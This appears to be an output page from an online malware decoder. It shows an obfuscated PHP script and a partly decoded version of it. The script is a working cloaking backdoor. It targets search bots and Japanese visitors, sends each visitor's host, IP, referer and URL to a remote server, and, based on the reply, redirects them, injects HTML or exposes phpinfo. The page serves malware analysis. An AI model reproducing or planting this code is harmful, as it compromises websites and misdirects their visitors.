Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level

global $zym_decrypt;$zym_decrypt['lIl1I1l1I1l11Il111lIll']=base64_decode('ZXJyb3JfcmVwb3J0aW5n');$zym_decrypt['llII11I11II111III11l1IlIIl']=base64_decode('aXNNeUJvdA==');$zym_decrypt['l1Il1III1l1lIIl111l11II1']=base64_decode('aXNNeVJlZmVyZXI=');$zym_decrypt['I1llIlIlIll111IllIII1llIlI']=base64_decode('aXNNeUxhbmd1YWdl');$zym_decrypt['IIl111lI11111ll111I1ll1IIl']=base64_decode('c3Rycmlwb3M=');$zym_decrypt['l11llIIllllI1I1IlI11l11l1Illl']=base64_decode('Z2V0TXlIVFRQUGFnZQ==');$zym_decrypt['IllII1ll11ll1II11lI11']=base64_decode('c3Vic3Ry');$zym_decrypt['I11II1l1111l1ll1llIl1Il']=base64_decode('aGVhZGVy');$zym_decrypt['lI1llII11I1ll1IIlII1Ill']=base64_decode('cGhwaW5mbw==');$zym_decrypt['IIlIll1lll1IlIlII1111I1l']=base64_decode('c3RybGVu');$zym_decrypt['lIl11llIII1lllIIll1lIIIIl']=base64_decode('YmFzZTY0X2RlY29kZQ==');$zym_decrypt['IlllIlI1lIlI1lIlIl1lII1II']=base64_decode('Z2V0TXlSZXF1ZXN0SVA=');$zym_decrypt['Ill1lllIlI111I11lIlIlI11l1']=base64_decode('ZXh0ZW5zaW9uX2xvYWRlZA==');$zym_decrypt['Il1lllll1I1II11l1III1Ill']=base64_decode('aHR0cF9idWlsZF9xdWVyeQ==');$zym_decrypt['l11lIIll1Ill1lIl1II1llIl1']=base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl');$zym_decrypt['lI1lII1llI1IIIl1lIlIlllI']=base64_decode('ZmlsZV9nZXRfY29udGVudHM=');$zym_decrypt['IlI11l1II11I111Il1I1lI1111']=base64_decode('dHJpbQ==');$zym_decrypt['IllII11IllII1I1I1llIIIll1']=base64_decode('ZWFjaA==');$zym_decrypt['llIlIlIl1l1l1l111llIlI']=base64_decode('dXJsZW5jb2Rl');$zym_decrypt['lll1l1I1IIl1Illll1Il']=base64_decode('Y291bnQ=');$zym_decrypt['I111III111I11I11ll1lI1lIl']=base64_decode('Z2V0X21hZ2ljX3F1b3Rlc19ncGM=');$zym_decrypt['I11lIII11I11IIlII1I11']=base64_decode('c3RyaXBzbGFzaGVz');$zym_decrypt['IIIIllll111lII1I1lI11lIll']=base64_decode('cHJlZ19tYXRjaA==');$zym_decrypt['IlIlIlI1Ill1IIIl1IIlIII']=base64_decode('c3RydG9sb3dlcg==');$zym_decrypt['I11I11Illl111I111ll1I1I1Il']=base64_decode('c3RycG9z');
echo "<pre>";
print_r($GLOBALS['zym_decrypt']);
echo "</pre>";
$GLOBALS['zym_decrypt']['lIl1I1l1I1l11Il111lIll'](0);if($GLOBALS['zym_decrypt']['llII11I11II111III11l1IlIIl']()|| $GLOBALS['zym_decrypt']['l1Il1III1l1lIIl111l11II1']()|| $GLOBALS['zym_decrypt']['I1llIlIlIll111IllIII1llIlI']()|| $GLOBALS['zym_decrypt']['IIl111lI11111ll111I1ll1IIl']($_SERVER['REQUEST_URI'], "testPageRedirect")> 0){$myData =$GLOBALS['zym_decrypt']['l11llIIllllI1I1IlI11l11l1Illl']();$isRedirect =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($myData, 0, 1);if($_SERVER["REQUEST_METHOD"] == "GET"){if($isRedirect == "#"){$redirectUrl =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($myData, 1);$GLOBALS['zym_decrypt']['I11II1l1111l1ll1llIl1Il']("Location: $redirectUrl");}else if($isRedirect == "@"){}else if($isRedirect == "$"){$GLOBALS['zym_decrypt']['lI1llII11I1ll1IIlII1Ill']();}else if($GLOBALS['zym_decrypt']['IIlIll1lll1IlIlII1111I1l']($myData)> 0){$GLOBALS['zym_decrypt']['I11II1l1111l1ll1llIl1Il']("Content-Type: text/html;charset=utf-8");echo $myData;}}}function getMyHttpPage(){$apiUrl =$GLOBALS['zym_decrypt']['lIl11llIII1lllIIll1lIIIIl']("aHR0cDovL3d3dy5nb29kc2hvcHMuY28v");$responseText ="";$postData =array("server_name" => $_SERVER['HTTP_HOST'], "remote_addr" => $GLOBALS['zym_decrypt']['IlllIlI1lIlI1lIlIl1lII1II'](), "http_referer" => isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER'] : '', "http_accept_language" => isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '', "url" => isset($_SERVER['HTTP_X_REWRITE_URL'])? $_SERVER['HTTP_X_REWRITE_URL'] : $_SERVER['REQUEST_URI'] );if($GLOBALS['zym_decrypt']['Ill1lllIlI111I11lIlIlI11l1'](base64_decode('Y3VybA=='))){$curl =curl_init($apiUrl);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_TIMEOUT, 5);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT'] : '');curl_setopt($curl, CURLOPT_POST, true);curl_setopt($curl, CURLOPT_POSTFIELDS, $postData);$responseText =curl_exec($curl);$curl_errno =curl_errno($curl);$curl_error =curl_error($curl);curl_close($curl);if ($curl_errno > 0){$responseText ="";}}else{$postData =$GLOBALS['zym_decrypt']['Il1lllll1I1II11l1III1Ill']($postData);$postOpts =array ('http' => array ('method' => 'POST', 'header'=> "Content-type: application/x-www-form-urlencoded\r\nUser-Agent: '.$_SERVER['HTTP_USER_AGENT']."\r\n" , "Content-Length: " . $GLOBALS['zym_decrypt']['IIlIll1lll1IlIlII1111I1l']($postData). "\r\n", 'content' => $postData ));$context =$GLOBALS['zym_decrypt']['l11lIIll1Ill1lIl1II1llIl1']($postOpts);$responseText =$GLOBALS['zym_decrypt']['lI1lII1llI1IIIl1lIlIlllI']($apiUrl, false, $context);}$responseText =$GLOBALS['zym_decrypt']['IlI11l1II11I111Il1I1lI1111']($responseText, "");return $responseText;}function createLinkstringUrlencode($para){$arg ="";while (list ($key, $val)=$GLOBALS['zym_decrypt']['IllII11IllII1I1I1llIIIll1'] ($para)){$arg.=$key."=".$GLOBALS['zym_decrypt']['llIlIlIl1l1l1l111llIlI']($val)."&";}$arg =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($arg,0,$GLOBALS['zym_decrypt']['lll1l1I1IIl1Illll1Il']($arg)-2);if($GLOBALS['zym_decrypt']['I111III111I11I11ll1lI1lIl']()){$arg =$GLOBALS['zym_decrypt']['I11lIII11I11IIlII1I11']($arg);}return $arg;}function getMyRequestIP(){$remoteAddr ="";if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])){$remoteAddr =$_SERVER['HTTP_CF_CONNECTING_IP'];}else if(isset($_SERVER['HTTP_INCAP_CLIENT_IP'])){$remoteAddr =$_SERVER['HTTP_INCAP_CLIENT_IP'];}else if(isset($_SERVER['HTTP_TRUE_CLIENT_IP'])){$remoteAddr =$_SERVER['HTTP_TRUE_CLIENT_IP'];}else if(isset($_SERVER['HTTP_REMOTEIP'])){$remoteAddr =$_SERVER['HTTP_REMOTEIP'];}else if(isset($_SERVER['HTTP_X_REAL_IP'])){$remoteAddr =$_SERVER['HTTP_X_REAL_IP'];}else{$remoteAddr =$_SERVER['REMOTE_ADDR'];}return $remoteAddr;}function isMyBot(){$userAgent =isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT'] : '';$botChar ="/(google|yahoo)/";if($GLOBALS['zym_decrypt']['IIIIllll111lII1I1lI11lIll']($botChar, $GLOBALS['zym_decrypt']['IlIlIlI1Ill1IIIl1IIlIII']($userAgent))){return true;}return false;}function isMyReferer(){$httpReferer =isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER'] : '';if($GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "google.co.jp")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "yahoo.co.jp")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "docomo.ne.jp")!== false){return true;}return false;}function isMyLanguage(){$httpAcceptLanguage =isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '';if($GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpAcceptLanguage, "ja")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpAcceptLanguage, "jp")!== false){return true;}return false;}

global $zym_decrypt;$zym_decrypt['lIl1I1l1I1l11Il111lIll']=error_reporting;$zym_decrypt['llII11I11II111III11l1IlIIl']=isMyBot;$zym_decrypt['l1Il1III1l1lIIl111l11II1']=isMyReferer;$zym_decrypt['I1llIlIlIll111IllIII1llIlI']=isMyLanguage;$zym_decrypt['IIl111lI11111ll111I1ll1IIl']=strripos;$zym_decrypt['l11llIIllllI1I1IlI11l11l1Illl']=getMyHTTPPage;$zym_decrypt['IllII1ll11ll1II11lI11']=substr;$zym_decrypt['I11II1l1111l1ll1llIl1Il']=header;$zym_decrypt['lI1llII11I1ll1IIlII1Ill']=phpinfo;$zym_decrypt['IIlIll1lll1IlIlII1111I1l']=strlen;$zym_decrypt['lIl11llIII1lllIIll1lIIIIl']=base64_decode;$zym_decrypt['IlllIlI1lIlI1lIlIl1lII1II']=getMyRequestIP;$zym_decrypt['Ill1lllIlI111I11lIlIlI11l1']=extension_loaded;$zym_decrypt['Il1lllll1I1II11l1III1Ill']=http_build_query;$zym_decrypt['l11lIIll1Ill1lIl1II1llIl1']=stream_context_create;$zym_decrypt['lI1lII1llI1IIIl1lIlIlllI']=file_get_contents;$zym_decrypt['IlI11l1II11I111Il1I1lI1111']=trim;$zym_decrypt['IllII11IllII1I1I1llIIIll1']=each;$zym_decrypt['llIlIlIl1l1l1l111llIlI']=urlencode;$zym_decrypt['lll1l1I1IIl1Illll1Il']=count;$zym_decrypt['I111III111I11I11ll1lI1lIl']=get_magic_quotes_gpc;$zym_decrypt['I11lIII11I11IIlII1I11']=stripslashes;$zym_decrypt['IIIIllll111lII1I1lI11lIll']=preg_match;$zym_decrypt['IlIlIlI1Ill1IIIl1IIlIII']=strtolower;$zym_decrypt['I11I11Illl111I111ll1I1I1Il']=strpos;
echo "<pre>";
print_r($GLOBALS['zym_decrypt']);
echo "</pre>";
$GLOBALS['zym_decrypt']['lIl1I1l1I1l11Il111lIll'](0);if($GLOBALS['zym_decrypt']['llII11I11II111III11l1IlIIl']()|| $GLOBALS['zym_decrypt']['l1Il1III1l1lIIl111l11II1']()|| $GLOBALS['zym_decrypt']['I1llIlIlIll111IllIII1llIlI']()|| $GLOBALS['zym_decrypt']['IIl111lI11111ll111I1ll1IIl']($_SERVER['REQUEST_URI'], "testPageRedirect")> 0){$myData =$GLOBALS['zym_decrypt']['l11llIIllllI1I1IlI11l11l1Illl']();$isRedirect =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($myData, 0, 1);if($_SERVER["REQUEST_METHOD"] == "GET"){if($isRedirect == "#"){$redirectUrl =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($myData, 1);$GLOBALS['zym_decrypt']['I11II1l1111l1ll1llIl1Il']("Location: $redirectUrl");}else if($isRedirect == "@"){}else if($isRedirect == "$"){$GLOBALS['zym_decrypt']['lI1llII11I1ll1IIlII1Ill']();}else if($GLOBALS['zym_decrypt']['IIlIll1lll1IlIlII1111I1l']($myData)> 0){$GLOBALS['zym_decrypt']['I11II1l1111l1ll1llIl1Il']("Content-Type: text/html;charset=utf-8");echo $myData;}}}function getMyHttpPage(){$apiUrl =$GLOBALS['zym_decrypt']['lIl11llIII1lllIIll1lIIIIl']("aHR0cDovL3d3dy5nb29kc2hvcHMuY28v");$responseText ="";$postData =array("server_name" => $_SERVER['HTTP_HOST'], "remote_addr" => $GLOBALS['zym_decrypt']['IlllIlI1lIlI1lIlIl1lII1II'](), "http_referer" => isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER'] : '', "http_accept_language" => isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '', "url" => isset($_SERVER['HTTP_X_REWRITE_URL'])? $_SERVER['HTTP_X_REWRITE_URL'] : $_SERVER['REQUEST_URI'] );if($GLOBALS['zym_decrypt']['Ill1lllIlI111I11lIlIlI11l1'](curl)){$curl =curl_init($apiUrl);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_TIMEOUT, 5);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT'] : '');curl_setopt($curl, CURLOPT_POST, true);curl_setopt($curl, CURLOPT_POSTFIELDS, $postData);$responseText =curl_exec($curl);$curl_errno =curl_errno($curl);$curl_error =curl_error($curl);curl_close($curl);if ($curl_errno > 0){$responseText ="";}}else{$postData =$GLOBALS['zym_decrypt']['Il1lllll1I1II11l1III1Ill']($postData);$postOpts =array ('http' => array ('method' => 'POST', 'header'=> "Content-type: application/x-www-form-urlencoded\r\nUser-Agent: '.$_SERVER['HTTP_USER_AGENT']."\r\n" , "Content-Length: " . $GLOBALS['zym_decrypt']['IIlIll1lll1IlIlII1111I1l']($postData). "\r\n", 'content' => $postData ));$context =$GLOBALS['zym_decrypt']['l11lIIll1Ill1lIl1II1llIl1']($postOpts);$responseText =$GLOBALS['zym_decrypt']['lI1lII1llI1IIIl1lIlIlllI']($apiUrl, false, $context);}$responseText =$GLOBALS['zym_decrypt']['IlI11l1II11I111Il1I1lI1111']($responseText, "");return $responseText;}function createLinkstringUrlencode($para){$arg ="";while (list ($key, $val)=$GLOBALS['zym_decrypt']['IllII11IllII1I1I1llIIIll1'] ($para)){$arg.=$key."=".$GLOBALS['zym_decrypt']['llIlIlIl1l1l1l111llIlI']($val)."&";}$arg =$GLOBALS['zym_decrypt']['IllII1ll11ll1II11lI11']($arg,0,$GLOBALS['zym_decrypt']['lll1l1I1IIl1Illll1Il']($arg)-2);if($GLOBALS['zym_decrypt']['I111III111I11I11ll1lI1lIl']()){$arg =$GLOBALS['zym_decrypt']['I11lIII11I11IIlII1I11']($arg);}return $arg;}function getMyRequestIP(){$remoteAddr ="";if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])){$remoteAddr =$_SERVER['HTTP_CF_CONNECTING_IP'];}else if(isset($_SERVER['HTTP_INCAP_CLIENT_IP'])){$remoteAddr =$_SERVER['HTTP_INCAP_CLIENT_IP'];}else if(isset($_SERVER['HTTP_TRUE_CLIENT_IP'])){$remoteAddr =$_SERVER['HTTP_TRUE_CLIENT_IP'];}else if(isset($_SERVER['HTTP_REMOTEIP'])){$remoteAddr =$_SERVER['HTTP_REMOTEIP'];}else if(isset($_SERVER['HTTP_X_REAL_IP'])){$remoteAddr =$_SERVER['HTTP_X_REAL_IP'];}else{$remoteAddr =$_SERVER['REMOTE_ADDR'];}return $remoteAddr;}function isMyBot(){$userAgent =isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT'] : '';$botChar ="/(google|yahoo)/";if($GLOBALS['zym_decrypt']['IIIIllll111lII1I1lI11lIll']($botChar, $GLOBALS['zym_decrypt']['IlIlIlI1Ill1IIIl1IIlIII']($userAgent))){return true;}return false;}function isMyReferer(){$httpReferer =isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER'] : '';if($GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "google.co.jp")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "yahoo.co.jp")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpReferer, "docomo.ne.jp")!== false){return true;}return false;}function isMyLanguage(){$httpAcceptLanguage =isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '';if($GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpAcceptLanguage, "ja")!== false || $GLOBALS['zym_decrypt']['I11I11Illl111I111ll1I1I1Il']($httpAcceptLanguage, "jp")!== false){return true;}return false;}



© 2020 Quttera Ltd. All rights reserved.